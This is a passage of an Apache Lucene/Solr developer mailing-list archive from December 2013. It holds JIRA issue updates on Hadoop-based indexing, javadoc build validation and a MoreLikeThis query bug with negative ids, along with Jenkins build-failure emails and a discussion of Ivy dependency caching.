>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-5355?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated LUCENE-5355:
--

Attachment: LUCENE-5355.patch

Patch.

> Add more support to validate the -Dbootclasspath given for javadocs generate
> 
>
> Key: LUCENE-5355
> URL: https://issues.apache.org/jira/browse/LUCENE-5355
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: general/build
>Affects Versions: 4.6
> Environment: MacOSX AppleJDK6
>Reporter: Uwe Schindler
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5355.patch
>
>
> When Simon created the nice looking javadocs for LuSolr 4.6, he just 
> copy-pasted the command line from 
> http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs
> Unfortunately this does not work with AppleJDK6, because it has no rt.jar! 
> The equivalent of rt.jar lives in a completely different directory and is 
> named classes.jar. I had a similar problem when I wanted to regenerate the 
> Javadocs on my Linux box, but specified {{-Dbootclasspath}} with shell 
> specials (e.g., {{~}} for the home dir).
> This patch will assist the user and will "validate" the given bootclasspath, 
> so that it points to a JAR file that actually contains the runtime. Also, to 
> make life easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to 
> the JDK home folder (same as JAVA_HOME) and Ant will figure out whether it is 
> Apple or Oracle or maybe only a JRE.
> In the meantime, I regenerated the 4.6 Javadocs with the correct bootclasspath.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Uwe Schindler (JIRA)
Uwe Schindler created LUCENE-5355:
-

 Summary: Add more support to validate the -Dbootclasspath given 
for javadocs generate
 Key: LUCENE-5355
 URL: https://issues.apache.org/jira/browse/LUCENE-5355
 Project: Lucene - Core
  Issue Type: Improvement
  Components: general/build
Affects Versions: 4.6
 Environment: MacOSX AppleJDK6
Reporter: Uwe Schindler
 Fix For: 5.0, 4.7


When Simon created the nice looking javadocs for LuSolr 4.6, he just copy-pasted 
the command line from 
http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs

Unfortunately this does not work with AppleJDK6, because it has no rt.jar! The 
equivalent of rt.jar lives in a completely different directory and is named 
classes.jar. I had a similar problem when I wanted to regenerate the Javadocs 
on my Linux box, but specified {{-Dbootclasspath}} with shell specials (e.g., 
{{~}} for the home dir).

This patch will assist the user and will "validate" the given bootclasspath, so 
that it points to a JAR file that actually contains the runtime. Also, to make 
life easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to the JDK 
home folder (same as JAVA_HOME) and Ant will figure out whether it is Apple or 
Oracle or maybe only a JRE.

In the meantime, I regenerated the 4.6 Javadocs with the correct bootclasspath.
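
Usage would then be roughly {{ant javadocs -Dbootjdk=/path/to/jdk}} instead of 
hand-building a {{-Dbootclasspath}} that points at rt.jar or classes.jar; the 
property names are as described above, the path is illustrative.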



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5521) MoreLikeThis component fails when item id is negative (begins with hyphen)

2013-12-02 Thread Bill Mitchell (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5521?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836935#comment-13836935
 ] 

Bill Mitchell commented on SOLR-5521:
-

The fix that I will be testing is to go into TermQuery.toString and wrap 
term.text() with quotation marks if it begins with a hyphen.
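
A sketch of that change against Lucene 4.x's {{TermQuery#toString(String)}} 
(an outline of the idea, not the final patch):

{code:java}
// Fragment, inside org.apache.lucene.search.TermQuery:
@Override
public String toString(String field) {
  StringBuilder buffer = new StringBuilder();
  if (!term.field().equals(field)) {
    buffer.append(term.field());
    buffer.append(":");
  }
  String text = term.text();
  if (text.startsWith("-")) {
    // Quote values that begin with a hyphen so the regenerated query
    // string re-parses on the shards instead of reading as a NOT clause.
    buffer.append('"').append(text).append('"');
  } else {
    buffer.append(text);
  }
  buffer.append(ToStringUtils.boost(getBoost()));
  return buffer.toString();
}
{code}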

> MoreLikeThis component fails when item id is negative (begins with hyphen)
> --
>
> Key: SOLR-5521
> URL: https://issues.apache.org/jira/browse/SOLR-5521
> Project: Solr
>  Issue Type: Bug
>  Components: MoreLikeThis
>Affects Versions: 4.2.1
>Reporter: Bill Mitchell
>Priority: Minor
>
> When the compared document's unique id is negative, the MoreLikeThis 
> component fails to generate a valid query to pass to each shard, because the 
> generated query does not enclose the item's negative id in quotes. In our 
> case, we add documents with a negative id as temporary beans, used just for 
> the MLT query and deleted later.
> You can see this with a rather simple MLT query:
> http://lga-sppsolrprod01.pulse.prod/solr/rawContents/select?mlt=true&q=itemId:-1578997856&mlt.fl=text&mlt.count=100
> where the returned response shows:
> [response markup stripped in transit; surviving values: status 400, echoed 
> params mlt.fl=text, q=itemId:-1578997856, mlt=true, error code 400, and 
> this message:]
> org.apache.solr.search.SyntaxError: Cannot parse 'itemId:-1578997856': 
> Encountered " "-" "- "" at line 1, column 7.
> Was expecting one of:
> <BAREOPER> ...
> "(" ...
> "*" ...
> <QUOTED> ...
> <TERM> ...
> <PREFIXTERM> ...
> <WILDTERM> ...
> <REGEXPTERM> ...
> "[" ...
> "{" ...
> <LPARAMS> ...
> <NUMBER> ...
> [the token names above are reconstructed from the standard query parser error message]



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836934#comment-13836934
 ] 

Mark Miller commented on SOLR-1301:
---

I've set up a local Jenkins job to run the two tests that have a problem with 
the test policy/manager. Next I'll file a JIRA issue for Yarn.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-5521) MoreLikeThis component fails when item id is negative (begins with hyphen)

2013-12-02 Thread Bill Mitchell (JIRA)
Bill Mitchell created SOLR-5521:
---

 Summary: MoreLikeThis component fails when item id is negative 
(begins with hyphen)
 Key: SOLR-5521
 URL: https://issues.apache.org/jira/browse/SOLR-5521
 Project: Solr
  Issue Type: Bug
  Components: MoreLikeThis
Affects Versions: 4.2.1
Reporter: Bill Mitchell
Priority: Minor


When the compared document's unique id is negative, the MoreLikeThis component 
fails to generate a valid query to pass to each shard, because the generated 
query does not enclose the item's negative id in quotes. In our case, we add 
documents with a negative id as temporary beans, used just for the MLT query 
and deleted later.

You can see this with a rather simple MLT query:
http://lga-sppsolrprod01.pulse.prod/solr/rawContents/select?mlt=true&q=itemId:-1578997856&mlt.fl=text&mlt.count=100

where the returned response shows:
[response markup stripped in transit; surviving values: status 400, echoed 
params mlt.fl=text, q=itemId:-1578997856, mlt=true, error code 400, and this 
message:]
org.apache.solr.search.SyntaxError: Cannot parse 'itemId:-1578997856': 
Encountered " "-" "- "" at line 1, column 7.
Was expecting one of:
<BAREOPER> ...
"(" ...
"*" ...
<QUOTED> ...
<TERM> ...
<PREFIXTERM> ...
<WILDTERM> ...
<REGEXPTERM> ...
"[" ...
"{" ...
<LPARAMS> ...
<NUMBER> ...
[the token names above are reconstructed from the standard query parser error message]



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller
Sorry - as Steve mentioned in IRC, you can also of course be more targeted and 
just remove the cache folder for the cdk-morphlines-core (com.cloudera.cdk) 
dependency.
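
(On a stock setup that cache folder is usually somewhere like 
{{~/.ivy2/cache/com.cloudera.cdk}}; the path is an assumption, so adjust it to 
wherever your Ivy cache actually lives.)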

- Mark

On Dec 2, 2013, at 4:01 PM, Mark Miller  wrote:

> If you are still having trouble after the latest commit, you may have to 
> remove your ~/.ivy cache and start fresh.
> 
> Ivy caching is funny: if you get a regular jar into the cache and then add 
> the definition for the dependency's test jar and resolve again, Ivy will act 
> as if it already has the test version when it does not, just because it sees 
> the regular version.
> 
> - Mark
> 
> On Dec 2, 2013, at 3:35 PM, Mark Miller  wrote:
> 
>> When I clicked on the raw log, it stopped downloading the output in my 
>> browser at the clover task. Now it’s downloading it fully - figured it was a 
>> crash.
>> 
>> - Mark
>> 
>> On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:
>> 
>>> Maven Central does not have one of the crazy new jar files from Cloudera.
>>> 
>>> It's not related to Clover.
>>> 
>>> Uwe
>>> 
>>> 
>>> 
>>> Mark Miller  wrote:
>>> Hmm… Clover did not like something?
>>> 
>>> - Mark
>>> 
>>> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server 
>>>  wrote:
>>> 
>>>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>>>  
>>>  No tests ran.
>>>  
>>>  Build Log:
>>>  [...truncated 13197 lines...]
>>>  BUILD FAILED
>>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499: The following error occurred while executing this line:
>>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: The following error occurred while executing this line:
>>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535: The following error occurred while executing this line:
>>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441: The following error occurred while executing this line:
>>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100: impossible to resolve dependencies:
>>>   resolve failed - see output for details
>>>  
>>>  Total time: 8 minutes 36 seconds
>>>  Build step 'Invoke Ant' marked build as failure
>>>  Archiving artifacts
>>>  Publishing Javadoc
>>>  Email was triggered for: Failure
>>>  Sending email for trigger: Failure
>>>  
>>>  
>>>  
>>> 
>>>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>>  For additional commands, e-mail: dev-h...@lucene.apache.org
>>> 
>>> 
>>> 
>>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>> For additional commands, e-mail: dev-h...@lucene.apache.org
>>> 
>>> 
>>> --
>>> Uwe Schindler
>>> H.-H.-Meier-Allee 63, 28213 Bremen
>>> http://www.thetaphi.de
>> 
> 



Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller
If you are still having trouble after the latest commit, you may have to remove 
your ~/.ivy cache and start fresh.

Ivy caching is funny: if you get a regular jar into the cache and then add the 
definition for the dependency's test jar and resolve again, Ivy will act as if 
it already has the test version when it does not, just because it sees the 
regular version.

- Mark

On Dec 2, 2013, at 3:35 PM, Mark Miller  wrote:

> When I clicked on the raw log, it stopped downloading the output in my 
> browser at the clover task. Now it’s downloading it fully - figured it was a 
> crash.
> 
> - Mark
> 
> On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:
> 
>> Maven Central does not have one of the crazy new jar files from Cloudera.
>> 
>> It's not related to Clover.
>> 
>> Uwe
>> 
>> 
>> 
>> Mark Miller  wrote:
>> Hmm… Clover did not like something?
>> 
>> - Mark
>> 
>> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server 
>>  wrote:
>> 
>>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>>  
>>  No tests ran.
>>  
>>  Build Log:
>>  [...truncated 13197 lines...]
>>  BUILD FAILED
>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499: The following error occurred while executing this line:
>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: The following error occurred while executing this line:
>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535: The following error occurred while executing this line:
>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441: The following error occurred while executing this line:
>>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100: impossible to resolve dependencies:
>>   resolve failed - see output for details
>>  
>>  Total time: 8 minutes 36 seconds
>>  Build step 'Invoke Ant' marked build as failure
>>  Archiving artifacts
>>  Publishing Javadoc
>>  Email was triggered for: Failure
>>  Sending email for trigger: Failure
>>  
>>  
>>  
>> 
>>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>  For additional commands, e-mail: dev-h...@lucene.apache.org
>> 
>> 
>> 
>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>> For additional commands, e-mail: dev-h...@lucene.apache.org
>> 
>> 
>> --
>> Uwe Schindler
>> H.-H.-Meier-Allee 63, 28213 Bremen
>> http://www.thetaphi.de
> 



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836909#comment-13836909
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547187 from [~markrmil...@gmail.com] in branch 'dev/trunk'
[ https://svn.apache.org/r1547187 ]

SOLR-1301: Ivy likes to act funny if you don't declare compile and test 
resources in the same dependency.
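
(Concretely, and as an assumption about the shape of the fix rather than a 
quote from it: declare both the regular jar and the tests-classifier artifact 
as {{artifact}} entries inside a single {{dependency}} element of the module's 
ivy.xml, instead of declaring the dependency twice.)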

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When the reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.
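
For illustration, here is a minimal sketch of the converter contract described
above. The interface shape, field names, and CSV layout are assumptions for
this example, not the patch's actual API:

{code:java}
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.io.Text;
import org.apache.solr.common.SolrInputDocument;

// Hypothetical converter in the spirit of SolrDocumentConverter: turns a
// Hadoop (key, value) pair holding one CSV line into a SolrInputDocument
// that SolrRecordWriter can add to its EmbeddedSolrServer batch.
public class CsvDocumentConverter {
  public SolrInputDocument convert(LongWritable key, Text value) {
    String[] cols = value.toString().split(",", -1);
    SolrInputDocument doc = new SolrInputDocument();
    doc.addField("id", cols[0]);    // assumes the first column is the unique key
    doc.addField("name", cols[1]);  // remaining fields are illustrative
    doc.addField("price", Float.parseFloat(cols[2]));
    return doc;
  }
}
{code}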



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller
When I clicked on the raw log, it stopped downloading the output in my browser 
at the clover task. Now it’s downloading it fully - figured it was a crash.

- Mark

On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:

> Maven Central does not have one of the crazy new jar files from cloudera.
> 
> It's not related to clover.
> 
> Uwe
> 
> 
> 
> Mark Miller  schrieb:
> Hmm…clover did not like something?
> 
> - Mark
> 
> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server  
> wrote:
> 
>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>  
>  No tests ran.
>  
>  Build Log:
>  [...truncated 13197 lines...]
>  BUILD FAILED
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>  The following error occurred while executing this line:
>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
> The following error occurred while executing this line:
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>  The following error occurred while executing this line:
> 
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>  The following error occurred while executing this line:
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>  impossible to resolve dependencies:
>   resolve failed - see output for details
>  
>  Total time: 8 minutes 36 seconds
>  Build step 'Invoke Ant' marked build as failure
>  Archiving artifacts
>  Publishing Javadoc
>  Email was triggered for: Failure
>  Sending email for trigger: Failure
>  
>  
>  
> 
>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>  For additional commands, e-mail: dev-h...@lucene.apache.org
> 
> 
> 
> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
> For additional commands, e-mail: dev-h...@lucene.apache.org
> 
> 
> --
> Uwe Schindler
> H.-H.-Meier-Allee 63, 28213 Bremen
> http://www.thetaphi.de



Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Uwe Schindler
Maven Central does not have one of the crazy new jar files from cloudera.

It's not related to clover.

Uwe



Mark Miller  schrieb:
>Hmm…clover did not like something?
>
>- Mark
>
>On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server
> wrote:
>
>> Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>> 
>> No tests ran.
>> 
>> Build Log:
>> [...truncated 13197 lines...]
>> BUILD FAILED
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>impossible to resolve dependencies:
>>  resolve failed - see output for details
>> 
>> Total time: 8 minutes 36 seconds
>> Build step 'Invoke Ant' marked build as failure
>> Archiving artifacts
>> Publishing Javadoc
>> Email was triggered for: Failure
>> Sending email for trigger: Failure
>> 
>> 
>> 
>> -
>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>> For additional commands, e-mail: dev-h...@lucene.apache.org
>
>
>-
>To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>For additional commands, e-mail: dev-h...@lucene.apache.org

--
Uwe Schindler
H.-H.-Meier-Allee 63, 28213 Bremen
http://www.thetaphi.de

[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8547 - Failure!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8547/
Java: 32bit/jdk1.8.0-ea-b117 -client -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 16441 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:441: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:491: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/build.xml:67:
 The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-core/build.xml:100:
 impossible to resolve dependencies:
resolve failed - see output for details

Total time: 51 minutes 54 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.8.0-ea-b117 -client -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller
Hmm…clover did not like something?

- Mark

On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server  
wrote:

> Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
> 
> No tests ran.
> 
> Build Log:
> [...truncated 13197 lines...]
> BUILD FAILED
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
> The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
